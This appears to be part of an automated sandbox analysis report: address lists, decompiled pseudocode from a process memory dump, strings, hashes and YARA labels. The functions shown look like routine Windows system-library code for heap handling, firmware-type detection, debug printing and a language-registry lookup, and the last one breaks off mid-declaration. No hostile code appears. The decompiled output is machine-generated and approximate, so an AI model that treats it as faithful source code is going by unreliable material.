0x00e0e661
0x00e0e665
0x00e6542a
0x00e0e715
0x00e0e71a
0x00e0e71c
0x00e0e720
0x00e0e720
0x00e0e727
0x00e0e736
0x00e0e736
0x00e0e743
0x00e0e743
0x00e0e673
0x00e0e678
0x00e0e67d
0x00e0e682
0x00e0e685
0x00e0e692
0x00e0e69b
0x00e0e6a3
0x00e0e6ad
0x00e0e6b1
0x00e0e6b2
0x00e0e6bb
0x00e0e6bf
0x00e0e6c0
0x00e0e6c8
0x00e0e6cc
0x00e0e6d5
0x00e0e6d9
0x00000000
0x00000000
0x00e0e6e5
0x00e0e6ea
0x00e0e6f9
0x00e0e70b
0x00e0e70f
0x00e65439
0x00e6545e
0x00e6545e
0x00000000
0x00e6545e
0x00e6543b
0x00e6543e
0x00e65440
0x00e65445
0x00e65472
0x00e65475
0x00e6548d
0x00e65493
0x00e654a9
0x00000000
0x00000000
0x00e654ab
0x00e654b4
0x00e654bc
0x00e654c8
0x00e654de
0x00e654fb
0x00e654e0
0x00e654e6
0x00e654eb
0x00e654eb
0x00e654de
0x00000000
0x00e654bc
0x00e65477
0x00e6547a
0x00e65480
0x00e65483
0x00e65486
0x00e6548b
0x00000000
0x00000000
0x00000000
0x00e6548b
0x00000000
0x00000000
0x00000000
0x00000000
0x00e65447
0x00e65447
0x00e65447
0x00e65447
0x00e6544e
0x00000000
0x00000000
0x00e65450
0x00e65452
0x00e65455
0x00e6545a
0x00000000
0x00000000
0x00000000
0x00e6545c
0x00e6546a
0x00e6546d
0x00e6546f
0x00000000
0x00e6546f
0x00e0e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00E0E68C
@, xrefs: 00E0E6C0
InstallLanguageFallback, xrefs: 00E0E6DB

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 78e0b44552212c5c9673332f0ec4baf5fd2caea11975df5e16aeb450bcff1aad
Instruction ID: dc11aa3b339ee8dd4978dbedc51ac519c983f6956f903744714155b9185d25db
Opcode Fuzzy Hash: 78e0b44552212c5c9673332f0ec4baf5fd2caea11975df5e16aeb450bcff1aad
Instruction Fuzzy Hash: 0851CEB26087459BC710DF24D440AABB3E8BF88758F04196EF996F7241EB34DD84C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00ECE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00ECE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00ECBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00ECBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00ECAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00E49730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00ECA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00ECA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00E49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00ECA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00ECA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00E22280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00E1B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00E1FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00E27D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00EBFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x00ece547
0x00ece549
0x00ece54f
0x00ece553
0x00ece557
0x00ece55a
0x00ece55c
0x00ece55f
0x00ece561
0x00ece567
0x00ece56b
0x00ece7e2
0x00000000
0x00ece571
0x00ece575
0x00ece577
0x00ece57b
0x00ece57c
0x00ece57d
0x00ece57e
0x00ece57f
0x00ece588
0x00ece58f
0x00ece591
0x00ece592
0x00ece592
0x00ece596
0x00ece59e
0x00ece5a0
0x00ece5a6
0x00ece61d
0x00ece61d
0x00ece621
0x00ece623
0x00ece630
0x00ece630
0x00ece7e6
0x00ece7eb
0x00ece7ed
0x00ece7f4
0x00ece7fa
0x00ece7ff
0x00ece7ff
0x00ece80a
0x00ece812
0x00ece812
0x00ece5ab
0x00ece5b4
0x00ece5b9
0x00ece5be
0x00ece5c0
0x00ece5c2
0x00ece5c8
0x00ece5c9
0x00ece5cb
0x00ece5cc
0x00ece5d5
0x00ece5e4
0x00ece5f1
0x00ece5f8
0x00ece5f8
0x00ece5d5
0x00ece602
0x00ece616
0x00ece63d
0x00ece644
0x00ece64d
0x00ece652
0x00ece657
0x00ece659
0x00ece65b
0x00ece661
0x00ece662
0x00ece664
0x00ece665
0x00ece66e
0x00ece67d
0x00ece68a
0x00ece691
0x00ece691
0x00ece66e
0x00ece6b0
0x00000000
0x00ece6b6
0x00ece6bd
0x00ece6c7
0x00ece6d7
0x00ece6d9
0x00ece6db
0x00ece6de
0x00ece6e3
0x00ece6f3
0x00ece6fc
0x00ece700
0x00ece700
0x00ece704
0x00ece70a
0x00ece70a
0x00ece713
0x00ece716
0x00ece719
0x00ece720
0x00ece761
0x00ece76b
0x00ece774
0x00ece77a
0x00ece77a
0x00ece78a
0x00ece791
0x00ece799
0x00ece79b
0x00ece79f
0x00ece7aa
0x00ece7c0
0x00ece7ac
0x00ece7b2
0x00ece7b9
0x00ece7b9
0x00ece7c7
0x00ece806
0x00000000
0x00ece7c9
0x00ece7d1
0x00ece7d8
0x00000000
0x00ece7d8
0x00000000
0x00000000
0x00ece722
0x00ece72e
0x00ece748
0x00ece74c
0x00ece754
0x00ece756
0x00ece75c
0x00ece75c
0x00000000
0x00ece75c
0x00ece758
0x00ece758
0x00000000
0x00ece758
0x00ece750
0x00000000
0x00000000
0x00ece752
0x00000000
0x00ece752
0x00ece730
0x00ece735
0x00ece73d
0x00ece73f
0x00000000
0x00000000
0x00ece741
0x00ece741
0x00000000
0x00ece741
0x00ece739
0x00000000
0x00000000
0x00ece73b
0x00000000
0x00ece73b
0x00ece722
0x00ece720
0x00ece6b0
0x00ece618
0x00000000
0x00ece618

Strings

`, xrefs: 00ECE5D7
`, xrefs: 00ECE670

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: e648438fe4aed4442fa6407f470d0efb0405c01effa699f05d59e4d78947e15e
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: ED91C0322043419FE724CE25CA41F5BB7E5AF84718F18992EF595EB380D776E806CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E851BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00E851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xee05f0);
				E00E5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00E1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00E853CA(0);
						return E00E5D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00E4F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00E23690(1, _t117, 0xde1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00E4AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00E24620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00E4AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00E8500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00E49860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x00e851be
0x00e851c3
0x00e851c8
0x00e851cd
0x00e851d0
0x00e851d3
0x00e851d8
0x00e851db
0x00e851de
0x00e851e0
0x00e851e3
0x00e851e6
0x00e851e8
0x00e85342
0x00e85351
0x00e85356
0x00e8535a
0x00e85360
0x00e85363
0x00e85366
0x00e85369
0x00e85369
0x00e8536b
0x00e8536b
0x00e85370
0x00e853a3
0x00e853a4
0x00e853a6
0x00e853ab
0x00e853ab
0x00e853ae
0x00e853ae
0x00e853b5
0x00e853bf
0x00e853bf
0x00e85375
0x00e85396
0x00e853a0
0x00e853a0
0x00000000
0x00e85396
0x00e85377
0x00e85379
0x00e8537f
0x00e8538c
0x00e85390
0x00000000
0x00e85390
0x00e851ee
0x00e851f1
0x00e85301
0x00e85310
0x00e85315
0x00e85318
0x00e8531b
0x00e85320
0x00e8532e
0x00e85331
0x00000000
0x00e85331
0x00e85328
0x00e85329
0x00000000
0x00e85329
0x00e851fa
0x00e85235
0x00e85236
0x00e85239
0x00e8523f
0x00e85240
0x00e85241
0x00e85242
0x00e85246
0x00e85247
0x00e8524e
0x00e85251
0x00e85267
0x00e85269
0x00e8526e
0x00e8527d
0x00e8527e
0x00e85281
0x00e85282
0x00e85287
0x00e85288
0x00e8528a
0x00e8528f
0x00e85294
0x00000000
0x00000000
0x00e8529a
0x00e8529c
0x00e8529e
0x00e8529e
0x00e852a4
0x00e852b0
0x00000000
0x00000000
0x00e852ba
0x00e852bc
0x00e852bc
0x00e852d4
0x00e852d9
0x00e852dc
0x00e852e1
0x00000000
0x00000000
0x00e852e7
0x00e852f4
0x00000000
0x00e852f4
0x00e85270
0x00000000
0x00e85270
0x00e851fc
0x00e851fd
0x00e85202
0x00e85203
0x00e85205
0x00e8520a
0x00e8520f
0x00000000
0x00000000
0x00e8521b
0x00e85226
0x00e8522b
0x00e8521d
0x00e8521d
0x00e85222
0x00e85222
0x00e8522d
0x00000000

Strings

UEFI, xrefs: 00E8521D
Legacy, xrefs: 00E85226

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: b883e5f2eb44bf59f140b3f56059a0606466a50742a2ce53f86e6fc784774aea
Instruction ID: 3f9e9aecbac7025c0fa6401e2152b353badef53ef794a0c8a63d86fc77064afd
Opcode Fuzzy Hash: b883e5f2eb44bf59f140b3f56059a0606466a50742a2ce53f86e6fc784774aea
Instruction Fuzzy Hash: 9D518E72A40A189FDB25EFA8C880AADBBF8FF48740F14542DE54DFB251DA709D40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E0B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00E0B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xedf7a8);
				E00E5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00E5D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00E4D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00E4F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00E5DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00E4B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00E4B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00E4E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00E4A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x00e0b171
0x00e0b171
0x00e0b171
0x00e0b171
0x00e0b171
0x00e0b176
0x00e0b17b
0x00e0b180
0x00e0b186
0x00e0b18f
0x00e0b198
0x00e0b1a4
0x00e0b1aa
0x00e64802
0x00e64802
0x00e64805
0x00e6480c
0x00e6480e
0x00e0b1d1
0x00e0b1d3
0x00e0b1de
0x00e0b1de
0x00e64817
0x00e6481e
0x00e64820
0x00e64822
0x00e64822
0x00e64824
0x00e64824
0x00e6482a
0x00000000
0x00000000
0x00e64835
0x00e6483a
0x00e6483d
0x00e6483f
0x00e64842
0x00e64842
0x00e64842
0x00e64846
0x00e6484c
0x00e6484e
0x00e64851
0x00e64851
0x00e64853
0x00e64854
0x00e64854
0x00e64858
0x00e6485a
0x00e6485a
0x00e6485d
0x00e6485f
0x00e64861
0x00e64861
0x00e64866
0x00e6486b
0x00e6486e
0x00e64871
0x00e64876
0x00e64876
0x00e64878
0x00e6487b
0x00e64884
0x00e64884
0x00000000
0x00e6487d
0x00e6487d
0x00e64882
0x00e64889
0x00e64889
0x00e6488f
0x00e64891
0x00e648e0
0x00e648e2
0x00e648e4
0x00e648e4
0x00e648e7
0x00e648e7
0x00e648ed
0x00e648f4
0x00e648f6
0x00e64951
0x00e64951
0x00e64953
0x00e64953
0x00e64956
0x00e64956
0x00e64958
0x00e64959
0x00e64959
0x00e6495d
0x00e6495d
0x00e6495f
0x00e6495f
0x00e64965
0x00e64969
0x00e649ba
0x00e649ba
0x00e649c1
0x00e649c5
0x00e649cc
0x00e649d4
0x00e649d7
0x00e649da
0x00e649e4
0x00e649e5
0x00e649f3
0x00e64a02
0x00000000
0x00e64a02
0x00e64972
0x00e64974
0x00000000
0x00000000
0x00e64976
0x00e64979
0x00e64982
0x00e64983
0x00e64984
0x00e6498b
0x00e6498d
0x00e64991
0x00e64993
0x00e64999
0x00e6499d
0x00e649a2
0x00e649a2
0x00e649a2
0x00e64999
0x00e649ac
0x00000000
0x00e649b3
0x00e648f8
0x00e648fe
0x00000000
0x00000000
0x00000000
0x00e648fe
0x00e64895
0x00e6489c
0x00e648ad
0x00e648b2
0x00e648b5
0x00e648b7
0x00e648ba
0x00e648bc
0x00e648c6
0x00e648c6
0x00e648cb
0x00e648d1
0x00e648d4
0x00e648d8
0x00e648d8
0x00000000
0x00e648d8
0x00e648be
0x00e648c0
0x00000000
0x00000000
0x00e648c2
0x00000000
0x00000000
0x00000000
0x00e648c4
0x00000000
0x00e64882
0x00e6487b
0x00e64904
0x00e64906
0x00000000
0x00000000
0x00e64908
0x00e6490e
0x00000000
0x00000000
0x00e64910
0x00e64917
0x00e64917
0x00000000
0x00e64917
0x00e0b1ba
0x00e647f9
0x00e647fc
0x00000000
0x00000000
0x00000000
0x00e647fc
0x00e0b1c0
0x00e0b1c0
0x00e0b1c3
0x00e0b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 00E648AD

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 2aa368c21d9fa48ac6d103b885be369b2239da3b2b6d4f1a2cf025604b0051d5
Instruction ID: 2227ac96f4a489bc7b8531d97ef22ad6d73581c409accf5e6e644b6988c65d64
Opcode Fuzzy Hash: 2aa368c21d9fa48ac6d103b885be369b2239da3b2b6d4f1a2cf025604b0051d5
Instruction Fuzzy Hash: F55101B1D4025A8EDB39CF64D845BAEBBF0BF40754F2051A9E899BB2C2C7704D818B90

Uniqueness

Uniqueness Score: -1.00%

Function 00E2B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00E2B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
